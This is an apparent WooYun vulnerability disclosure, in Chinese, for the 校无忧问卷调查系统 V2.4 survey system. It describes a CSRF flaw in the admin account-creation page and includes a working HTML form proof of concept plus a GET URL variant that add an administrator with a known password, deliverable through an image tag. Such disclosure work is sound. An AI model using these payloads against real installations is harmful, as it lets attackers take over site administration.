WooYun.org

测试系统信息（官网最新版）：
官网：http://www.xiao5u.com/Product/Survey.html
系统名称：校无忧问卷调查系统
系统版本：V2.4
##1 后台添加管理员帐号的请求如下。

##2 经过测试发现请求没有验证referer，所以可以构造外部poc来进行CSRF攻击，POC测试代码如下。

<form id="csrfdemo" action="http://127.0.0.1/asp/Survey/admin/Admin.asp" method="POST">
<input type='hidden' name='Username' value='test111'><input type='hidden' name='Password1' value='123456'><input type='hidden' name='Password2' value='123456'><input type='hidden' name='action' value='yes'>
</form>
<button onclick="document.getElementById('csrfdemo').submit()">测试</button>

##3 测试中又发现，这里对于请求的类型也没有做严格的判断，所以可以将POST请求改写为GET请求。
http://127.0.0.1/asp/Survey/admin/Admin.asp?Username=test222&Password1=123456&Password2=123456&action=yes
##4 这样又以另外一种姿势可以CSRF攻击了。

##5 当后台管理访问了攻击者精心构造的URL，或者利用<img src=xxx>这种方式访问了图片，也会发起一次GET请求。那么就会自动给后台添加一个管理员。这样，攻击者就可以直接用新添加管理员帐号和密码进行后台的登录了。